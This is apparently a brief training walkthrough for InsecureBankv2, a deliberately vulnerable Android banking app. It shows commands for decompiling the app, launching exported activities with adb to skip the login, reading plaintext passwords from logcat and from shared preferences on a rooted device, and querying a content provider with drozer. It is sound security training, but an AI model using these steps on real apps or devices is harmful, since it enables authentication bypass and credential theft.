InsecureBankv2 is a vulnerable-by-design Android application created for security analysts to practice reverse engineering, static analysis (SAST), and dynamic analysis (DAST).
# Decompile resources and AndroidManifest.xml using apktool:
apktool d InsecureBankv2.apk -o InsecureBank_Source
# Decompile directly to readable Java code using JADX:
jadx-gui InsecureBankv2.apkA good analyst first reviews what the app requests in the AndroidManifest.xml.
Analyzing the AndroidManifest.xml, you discover that the transfer activity (.DoTransfer) has the android:exported="true" attribute. Use the Android Debug Bridge (ADB) and the Activity Manager (am) to directly invoke this screen on the connected mobile device and bypass the login.
If an activity is exported, any other app can open it directly, skipping the login screen.
adb shell
am start -n com.android.insecurebankv2/.PostLogin
am start -n com.android.insecurebankv2/.ChangePasswordStoring unencrypted data on the phone is the #1 mistake in mobile apps.
# Monitor logs for hardcoded credentials being printed:
adb logcat | grep "insecurebankv2"
# Check Shared Preferences for plaintext passwords (Requires Root):
adb shell
su
cat /data/data/com.android.insecurebankv2/shared_prefs/mySharedPreferences.xmlDrozer interacts with apps via IPC (Inter-Process Communication).
dz> run app.package.attacksurface com.android.insecurebankv2
dz> run app.provider.query content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers